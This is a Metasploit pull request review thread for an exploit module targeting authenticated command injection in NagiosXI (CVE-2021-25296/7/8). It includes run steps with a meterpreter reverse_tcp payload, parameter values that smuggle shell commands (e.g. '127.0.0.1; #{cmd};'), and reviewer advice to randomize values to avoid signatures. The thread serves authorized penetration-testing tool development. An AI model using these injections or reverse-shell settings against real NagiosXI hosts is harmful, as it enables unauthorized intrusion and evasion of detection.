Add NagiosXI authenticated RCE (CVE-2021-25296, CVE-2021-25297,CVE-2021-25298) exploit module
rapid7/metasploit-framework pull request #17494
Opened 2023-01-18 15:04 UTC by k0pak4

This PR adds an exploit module for three CVEs  (CVE-2021-25296, CVE-2021-25297,CVE-2021-25298) that perform command injection against NagiosXI 5.7.5. It utilizes the Nagios login mixin for target verification and authentication.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/nagios_xi_configwizards_authenticated_rce`
- [ ] `set RHOSTS TARGET_IP`
- [ ] `set RPORT 443`
- [ ] `set SSL true`
- [ ] `set USERNAME USER`
- [ ] `set PASSWORD PASSWORD`
- [ ] `set TARGET_URL_PARAM plugin_output_len`
- [ ] `set LHOST YOUR_IP`
- [ ] `set LPORT YOUR_LISTENING_PORT`
- [ ] `run`

## Vulnerable Software
The easiest way to test is against the official OVA (https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).) but installing it manually on linux is also an option.

![cve_msf](https://user-images.githubusercontent.com/9121784/213206424-326a97a8-9229-4916-83f3-2203261cd4c6.png)

2023-01-19 15:02 UTC, dwelch-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'password' => 'password',
Should this be using the password datastore value or is the vuln making this a hardcoded value?

2023-01-19 15:16 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'password' => 'password',
It could, the value doesn't matter it just has to be not blank in order for the payload to hit the right spot in the code. I've tried it with blank values and it wasn't triggering the RCE, but I've never tried it with the actual valid password

2023-01-19 15:22 UTC, bwatters-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'password' => 'password',
If the value does not matter, we should probably randomize it...

2023-01-19 17:04 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'password' => 'password',
Is there a specific MSF function for random strings in payloads? Similarly for an IP? Just curious so i don't rewrite something someone already did

2023-01-19 17:16 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'password' => 'password',
https://github.com/rapid7/metasploit-framework/blob/bca837413fea81b6466d124438dd3c9a17a7e416/lib/msf/core/exploit.rb#L1166 is a common one, basically we use Rex::Text.rand_text_XXX for generating random strings.

You can also do ranges so like `Rex::Text.rand_text_alpha(7..20)` to do 7 to 20 characters of alphabetical text.

2023-01-19 17:17 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'password' => 'password',
As for IP addresses I don't think there is a specific class for that that I'm aware of though you could likely do a series of `Rex::Text.rand_text_numeric` calls?

2023-01-20 14:27 UTC, k0pak4 commented
FWIW the lint failure appears to be unrelated, the error is about a file read issue and it can't be rerun

2023-01-20 16:19 UTC, gwillcox-r7 commented
@k0pak4 Seems like this was a GitHub cache issue that caused an issue due to missed cache hit. I reran the checks so that you should get the right information now.

2023-01-20 16:28 UTC, k0pak4 commented
Thanks @gwillcox-r7 ! Normally I can rerun failed checks, but maybe I couldn't this time because it's a PR based check and not a normal branch one 🤷‍♂️ Appreciate the assist!

2023-01-20 18:13 UTC, gwillcox-r7 commented
> Thanks @gwillcox-r7 ! Normally I can rerun failed checks, but maybe I couldn't this time because it's a PR based check and not a normal branch one 🤷‍♂️ Appreciate the assist!

Yeah a few of them normal people can't rerun, not sure why that one specifically was blocked but I know we had some security concerns recently about bots running automatically on code so it may have been updated as part of those set of fixes 🤷

2023-01-25 17:46 UTC, jvoisin commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        datastore['TARGET_URL_PARAM'] => "9999; #{cmd};"
The port number could be randomized

2023-01-25 17:51 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        datastore['TARGET_URL_PARAM'] => "9999; #{cmd};"
it's actually not a port number, it's a configuration number for a setting in the windowswmi selector. It has to be above 8000 or something in order to trigger the command injection. I could randomize it inbetween that, but can't guarantee it would work on all numbers, and don't think it's worth randomizing to possibly cause failure

2023-01-27 23:12 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'password' => 'password',
Turns out for plugin_output_len they were actually needed after some more testing. I randomized all the strings in its payload, using a 5 digit number to ensure the length value is large enough to trigger the vuln. It should be all set and randomized now

2023-01-27 23:13 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        datastore['TARGET_URL_PARAM'] => "9999; #{cmd};"
I made it a 5 digit number to ensure it was large enough, and randomized the value now

2023-01-31 18:53 UTC, gwillcox-r7 requested changes
Haven't fully reviewed the check method but left some comments on what needs fixing in the meantime. Once this is fixed up I can take a look over the `check` code again since the module will likely need some adjustments to fix some of the issues mentioned.

2023-01-31 18:53 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +
```suggestion

```

2023-01-31 18:53 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +The vulnerable URL parameter to inject payloads into. Defaults to plugin_output_len with ip_address as another option.
```suggestion
The vulnerable URL parameter to inject payloads into. Defaults to `plugin_output_len`.
```

Don't think the extra info is needed here, this should be sufficient.

2023-01-31 18:53 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +Target is CentOS running NagiosXI 5.7.5 (Official OVA)
This is good detail but should really be in a subheading:

```suggestion
### CentOS running NagiosXI 5.7.5 (Official OVA)
```

2023-01-31 18:53 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +Tested Nagios XI 5.7.5 on CentOS using their provided OVA
```suggestion
```

This is why we have subheadings for scenarios: we should be including that information there. Atm this is just replication.

2023-01-31 18:53 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +- https://nvd.nist.gov/vuln/detail/CVE-2021-25296
This should really be in the main module itself in the References section.

```suggestion
```

2023-01-31 18:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +          OS command injection vulnerabilities in several URL parameters that enables
```suggestion
          OS command injection vulnerabilities in the `ip_address` and `plugin_output_len` GET parameters which can allow
```

2023-01-31 18:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +          been successfully tested against the official NagiosXI 5.7.5 OVA.
Do we know if it affects prior versions at all? The advisories only list 5.7.5 but doesn't look like anyone tried checking older versions to see if it still applies or is specific to just this version.

2023-01-31 18:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
Question but why would we want to run an x86 Meterpreter on an x64 host? This seems like an odd default for a x64 target.

2023-01-31 18:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      OptString.new('PASSWORD', [true, 'Password to authenticate with', nil]),
These are already provided by the `NagiosXI` mixin your importing and are actually defined pretty much exactly the same. There is no need to redefine them here.

2023-01-31 18:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      'nsp' => @nsp
There is no guarantee that someone will run the `check` method before trying to exploit a target. Right now this code will fail if the user doesn't run the `check` code. And yes I get that `autocheck` is enabled but the user can still disable checks with that imported and cause this to fail.

2023-01-31 18:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'check_wmic_plus_ver' => '1.65',
Can this be randomized or does this have to be this specific version number?

2023-01-31 18:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    }, 0)
Why is the timeout for this command being set to 0? That seems odd.

2023-01-31 18:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'wizard' => 'windowswmi',
`windowswmi` and `digitalocean` for the parameter values correspond to CVE-2021-25296 and CVE-2021-25298 respectively, but I don't see how your exploiting CVE-2021-252297 here which uses the `switch` value for the `wizard` parameter and uses the vulnerable `ip_address` parameter.

2023-01-31 18:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
You don't have a case here to handle the case where 4 is returned from this call.

2023-01-31 18:59 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'wizard' => 'windowswmi',
That's true. It probably makes more sense to change it from target_url_param to target_config_wizard so that all three can be hit and the module gets coverage for all three

2023-01-31 19:51 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +          been successfully tested against the official NagiosXI 5.7.5 OVA.
I don't know right now, but after I address the rest of the comments I'll pull a few older OVAs and see if I can get an idea of whether it does or not

2023-01-31 19:52 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      'nsp' => @nsp
This is a good point. I had taken this style from one of the other NagiosXI authenticated RCE modules. I'll rework the check and move the auth into the exploit. After that, I'll open an issue for the other module

2023-01-31 19:53 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'check_wmic_plus_ver' => '1.65',
I'll find out!

2023-02-02 11:27 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    }, 0)
When the RCE hits, the http response is never sent back to us. So there's no need for a timeout because we don't expect a response

2023-02-02 13:05 UTC, k0pak4 commented
@gwillcox-r7 I addressed all of the PR comments except for testing prior NagiosXI versions. I'll do that today but wanted to push the rest up in the meantime. If older versions hit, I'll update the code & docs to reflect that. The biggest changes are: adding `switch` wizard support, moving authenticate to a separate function, performing the authenticate either in check or exploit to support not using autocheck but without authenticating twice, and changing the target parameter to be the wizard. I'll wait for feedback before opening an issue for the other NagiosXI module I saw using a similar check style. I'll probably end up doing that myself now that I have a good NagiosXI workflow/environment but in case I don't I want to make sure it doesn't slip through the cracks.

2023-02-02 17:52 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    }, 0)
Ah thanks, I might add a comment into here for context since that is useful information to have. I agree on the current settings though 👍

2023-02-02 17:53 UTC, gwillcox-r7 commented
Thanks @k0pak4 will go through this now and review 👍

2023-02-02 19:39 UTC, k0pak4 commented
Thanks @gwillcox-r7 . Turns out it's actually vulnerable from 5.5.6 to 5.7.5. Before 5.5.8, the ip_address parameter is named address, so I had to re-work some of the check to have authenticate also set the version string since it has the response body available. Thanks for the suggestion to check older versions! I'll send in update requests for the CVEs to reflect that.

2023-02-03 19:30 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +while switch and digitalocean use ip_address.
```suggestion
on NagiosXI from versions 5.5.6 to 5.7.5. There are three vulnerable configuration wizards (`windowswmi`, `switch`, `digitalocean`) that 
use two vulnerable URL parameters (`ip_address`, `plugin_output_len`). The `windowswmi` uses the `plugin_output_len`,
while `switch` and `digitalocean` use `ip_address`.
```

2023-02-03 19:30 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +This module exploits CVE-2021-25926, CVE-2021-25927, or CVE-2021-25928, OS command injection vulnerabilities in `/nagiosxi/config/monitoringwizard.php` that enables an authenticated user to achieve r
New changes look good but made a suggestion to add some code highlighting to the parameter names as this will make it easier to pick out from the text. Marking this as resolved though since root issue here has been fixed.

2023-02-03 19:36 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +obtain the Nagios XI version number, which is then used to check if the target is version 5.7.5 and therefore vulnerable.
Looks like there was an extra space at the end of line 4 here so will go ahead and fix that up but otherwise fine. Appreciate you making these changes!

2023-02-03 19:37 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +The vulnerable URL parameter to inject payloads into. Defaults to plugin_output_len with ip_address as another option.
This was removed in favor of TARGET_CONFIG_WIZARD with the recent updates which looks fine in its current state. Marking this as resolved.

2023-02-03 19:44 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +          been successfully tested against the official NagiosXI 5.7.5 OVA.
Looks like this was updated and we confirmed older versions are indeed vulnerable. Marking resolved.

2023-02-03 19:47 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'check_wmic_plus_ver' => '1.65',
Thanks thats much appreciated!

2023-02-03 19:49 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    }, 0)
Will add a comment in here for additional context. Marking as resolved.

2023-02-03 19:54 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'wizard' => 'windowswmi',
One thing I'd question here is if it wouldn't be better to map these to their CVE numbers vs doing this based on target configuration wizard and expecting the user to know which wizard they want to target.

2023-02-03 19:57 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      'nsp' => @nsp
This is still broken now but in a different way. You can't call `authenticate` from your `check` method as `authenticate` could fail with `fail_with` statements and we can't have any function path that starts at `check` and may end in a `fail_with` call or else `check` will break.

2023-02-03 19:57 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +while switch and digitalocean use ip_address.
Will fix this with the upcoming commit.

2023-02-03 20:00 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +An OVA with the vulnerable NagiosXI application can be downloaded from Nagios [here](https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.7.5-64.ova).
Information here is sufficient for now, marking resolved.

2023-02-03 20:01 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
This has not been resolved despite this being marked as outdated. 

Ideally what you should have is multiple targets. One for Linux x64, one for Linux x86 and one for ARCH_CMD, and then set the Arch, Platform, and the DefaultOption for the payload accordingly.

2023-02-03 20:30 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      'nsp' => @nsp
Got it. The problem is I can't grab the version number without being authenticated (it redirects to login when trying to grab it unauthenticated). Do you have any suggestions as to a better way to structure the calls?

2023-02-03 20:31 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
Sounds good, I can make that adjustment

2023-02-03 20:36 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'wizard' => 'windowswmi',
Fixed in e533cb80432959264692d0e94ee6f48c2733ba25.

2023-02-03 20:37 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
Failed to notice we already had ARCH_CMD in here. Went and updated this to have a separate default payload for x86 with e533cb80432959264692d0e94ee6f48c2733ba25.

2023-02-03 20:37 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      'nsp' => @nsp
@k0pak4 I'll leave this one to you, as this will likely require some redesigning of the code.

2023-02-03 20:38 UTC, gwillcox-r7 commented
@k0pak4 Looks like most comments were resolved. Still have an outstanding concern r.e the `check` method. See comments above for more info. I went ahead and fixed the other issues so long where relevant (there were only 2-3 or so) so the code should be ready to review again after this is fixed.

2023-02-03 20:44 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      'nsp' => @nsp
Sorry review on GitHub didn't show this message before I left the comment for some reason (GitHub being weird with threading updates). I would recommend changing this so that the `authenticate` function instead returns some codes such as 1,2,3 etc. Then the caller of that code can act on those codes with `fail_with` or CheckCode specific errors depending on who is calling it.

2023-02-03 21:36 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      'nsp' => @nsp
Updated authenticate to send return codes and error messages based on where it fails, and the check/exploit return CheckCode or fail_with those error messages. (Also added some other minor updates such as fixing the docs to reference the new CVE param)

2023-02-04 03:20 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    @nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)[0][0]
There is no guarantee that this scan will actually match, yet you are doing `[0][0]` blindly on it assuming it will always return a match. Please make sure that whenever you are doing regex, particularly against server responses or user input which could change, that you always make sure to first check that there was a match and only then retrieve the results. Otherwise you could end up crashing the module and causing stack traces, which will likely frustrate and confuse users.

2023-02-04 03:20 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        address_param => "127.0.0.1; #{cmd};",
In all of these examples we are using a value of `127.0.0.1`. Do we know if we could randomize this or somehow supply a random IP address? Otherwise this is going to be a lot easier to signature if we keep providing the same IP address every time we attack the vuln. If however the IP address needs to be valid though then this may be a limitation to this approach but it is something we should look into.

2023-02-04 03:20 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    end
This comment might need to be moved to the top where you add a new block explaining that this only affects two CVEs listed here and not CVE-2021-25296. The flow of this makes me think okay we have an "if/else" statement that will affect the rest of these cases however in reality it only affects 2/3 of them. Adding comments here will help clear this up.

2023-02-04 03:20 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      'nsp' => @nsp
There are still issues with the code that I'll leave a review on, but the core issue here with `@nsp` has been resolved so I'm going to mark this discussion as resolved.

2023-02-04 03:28 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
What is this regex trying to do? Should add a comment here denoting this. All of the current NagiosXI version regex logic is in the library so it makes me question if this is something we should be adding there instead of specifically in this module.

2023-02-04 03:41 UTC, gwillcox-r7 requested changes

2023-02-04 03:41 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    end
Reviewing this further I'd like to see some example version numbers put into a comment above this and also for this to be moved into the library since its likely to see reuse. We already have most of the NagiosXI version parsing logic there so this would likely be an addition to that existing logic.

I also don't see why we would want to use a old 1.0.0 version as a placeholder. Is that cause of the extra characters that Rex can't handle? Is that cause these versions are specifically for really old versions of NagiosXI? I can't tell from reading this code at the moment.

2023-02-04 03:41 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    end
This isn't quite correct. In the case of you returning code 6 you should likely be returning `CheckCode::Detected` as noted at https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html#check-codes since you know its NagiosXI but you weren't able to determine the version installed.

Same goes for if you couldn't sign the license agreement or couldn't fully install NagiosXI: you know NagiosXI is installed you just couldn't sign the license agreement or fully install NagiosXI correctly so you don't know what version is installed.

2023-02-04 14:11 UTC, k0pak4 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +The OVA has NagiosXI running on startup, but must be fully installed and have the license agreement accepted.
I'll add more explicit instructions 👍

2023-02-04 14:32 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'DefaultTarget' => 2,
The targets go 0,1,2 so I updated it in the previous batch of updates 👍

2023-02-04 18:26 UTC, k0pak4 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +### CentOS7 running NagiosXI 5.5.6 to 5.7.5 (Official OVA)
It hasn't changed, the steps have stayed the same through the older versions 🙂

2023-02-04 19:44 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    end
Yes, some of the older Nagios versions have a different format that is prepended with the year, RC, R1.0, etc. (see the naming convention at the bottom of here: https://www.nagios.com/downloads/nagios-xi/older-releases/) and the Rex only handles version numbers in a format of single numbers or y.y.y. The reasoning behind this not being in the version code itself is that it's plausible that a NagiosXI module could be written for one of those versions, and if we obliterate the actual version with a placeholder that Rex can understand, then we can't detect versions pre-5.2. I think ideally Rex::Version would just handle different formats, but that's probably outside the scope of the PR, and I'm not exactly sure how comparison would work in some of the odder formats.

However, I will add a detailed comment explaining why this is here, and examples of what it detects

2023-02-04 20:28 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        address_param => "127.0.0.1; #{cmd};",
Yeah, it is needed due to the previous shell command requiring an IP so it doesn't fail over. I'll randomize it in the next commit

2023-02-04 20:41 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        login_result, res_array = login_after_install_or_license(username, password, finish_install)
Yeah, the license agreement signing takes a second or two in practice, so I added a sleep with a message detailing why

2023-02-04 20:42 UTC, k0pak4 commented
@gwillcox-r7 I addressed all the requested changes I think. I tested the module again as well after all the changes. The documentation should be more thorough on the installs, and the check/authenticate should give more detailed statuses and error messages by propagating the ones returned from nagios_xi_login. I also added the requested checks for nil values, etc. so it should be more resilient

2023-02-06 17:00 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        'DefaultTarget' => 2,
Woops thought we started counting from 0 for targets. I was off by one 😄 Marking resolved

2023-02-06 17:12 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
New checks look much better and this appears to now be fixed. Thanks for putting in the time to address this! ❤️

2023-02-06 17:28 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +The OVA has NagiosXI running on startup, but must be fully installed and have the license agreement accepted.
Instructions look good! Thanks for adding these in ❤️

2023-02-06 17:30 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +it manually.
New comment is short and too the point whilst also allowing you to refer to later sections for more details. Looks good! 👍

2023-02-06 17:37 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    end
New comment looks good! Marking resolved

2023-02-06 17:39 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +### CentOS7 running NagiosXI 5.5.6 to 5.7.5 (Official OVA)
I think we added some additional output statements so mainly I just wanted to double check that we didn't need to update things to take those into account, particularly given combination of some logic and output changes here. That being said I think most of this should in theory be the same, just need to double check.

2023-02-06 17:54 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      return login_result, 'Failed to authenticate to NagiosXI'
This has been fixed by updating this code to pass along the message returned and to also add additional code to properly check and handle the various 0-6 codes.

2023-02-06 17:57 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +      end
New code looks good, marking resolved.

2023-02-06 17:58 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    end
New code looks good, marking resolved.

2023-02-06 18:01 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
The comment here has been removed however the concern I raised has not been addressed.

2023-02-06 18:23 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
Ah, I had thought the comment was in a different place where I added a check for the nsp/auth cookies. I'll add a check to it

2023-02-06 18:25 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
I think the diff might be showing incorrectly. I added a check on the length of the response array before setting it here:
```    # Extract the authenticated cookies and nsp to use throughout the module
    if res_array.length == 2
      @auth_cookies = res_array[1]
      nsp = res_array[0].scan(/nsp_str = "([a-z0-9]+)/)
      if nsp
        @nsp = nsp[0][0]
      end
    else
      return login_result, 'Failed to extract auth cookies and nsp string'
    end```

2023-02-06 18:27 UTC, k0pak4 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +### CentOS7 running NagiosXI 5.5.6 to 5.7.5 (Official OVA)
Oh yes, the output statements have changed slightly. I'll update

2023-02-06 18:37 UTC, gwillcox-r7 requested changes
A few comments from reviewing the PR comments I left.

2023-02-06 18:37 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
All the others are without this `\"` part so not sure if that was intentional or not?

2023-02-06 18:37 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
Hmm I think I may have confused this with a different issue I will be leaving a comment on shortly. I was looking at `res_array[1]` and thinking that needed checking but failed to notice the `res_array.length` check beforehand; sorry about that! 

@nsp however should have an `else` statement though, otherwise you will end up with the possibility of falling through, having the code think that you set everything successfully, when in reality `@nsp` hasn't been set or initialized yet so you will be accessing a nonexistent variable later on in your code.

2023-02-06 18:37 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        address_param => "127.0.0.1; #{cmd};",
Looks like this was resolved, nice work on creating the solution for this!

2023-02-06 18:37 UTC, k0pak4 commented on documentation/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce.md
> +### CentOS7 running NagiosXI 5.5.6 to 5.7.5 (Official OVA)
Updated, minor changes but mostly the sending the payload output changed

2023-02-06 18:39 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
It is, the shell command it's appended to in this particular case needs a quote escaped in order to end it with the semicolon

2023-02-06 18:45 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
Fixed in https://github.com/rapid7/metasploit-framework/pull/17494/commits/d58a0e1551124812d3c93acc8208d2208e1d6af2

2023-02-06 18:59 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    end
I'm not convinced this regex will correctly detect all versions. In particular for 2014 versions we have stuff like this:

[xi-2014r1.0RC1](https://assets.nagios.com/downloads/nagiosxi/2014/xi-2014r1.0RC1.tar.gz)

We also have super old 2009 versions with this type of info to them:

[xi-2009r1fix](https://assets.nagios.com/downloads/nagiosxi/2009/xi-2009r1fix.tar.gz)
[xi-2009r1.1f](https://assets.nagios.com/downloads/nagiosxi/2009/xi-2009r1.1f.tar.gz)

As for the Rex limitations....yeah I don't have a timeline on that. Its a long standing known issue and I honestly don't expect that limitation to change anytime soon without a significant and likely highly impactful edit, which is unlikely to happen specifically because its significant and highly impactful and would run the risk of breaking existing behavior in a lot of modules.

I'll review the comment update you have made so long though.

2023-02-06 19:02 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +        address_param => Array.new(4) { rand(256) }.join('.') + "\"; #{cmd};",
Sounds good, just wanted to double check but if this is expected I'll mark this as resolved.

2023-02-06 19:07 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
```suggestion
    if /^\d{4}[Rr]\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}[Rr]\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
```

This will allow you to detect versions like [xi-2009r1.1f](https://assets.nagios.com/downloads/nagiosxi/2009/xi-2009r1.1f.tar.gz), as well as [xi-2014r2.5](https://assets.nagios.com/downloads/nagiosxi/2014/xi-2014r2.5.tar.gz)

2023-02-06 19:08 UTC, k0pak4 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    end
Yeah, I can imagine that being a can of worms of sorts. Plus there will always be strange corner cases (like our old Nagios friend here), so I agree completely

2023-02-06 19:09 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb
> +    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
Actually on second thought, I don't know of any releases where the release number was put after an uppercase R, the only uppercase version appears to be for RC.

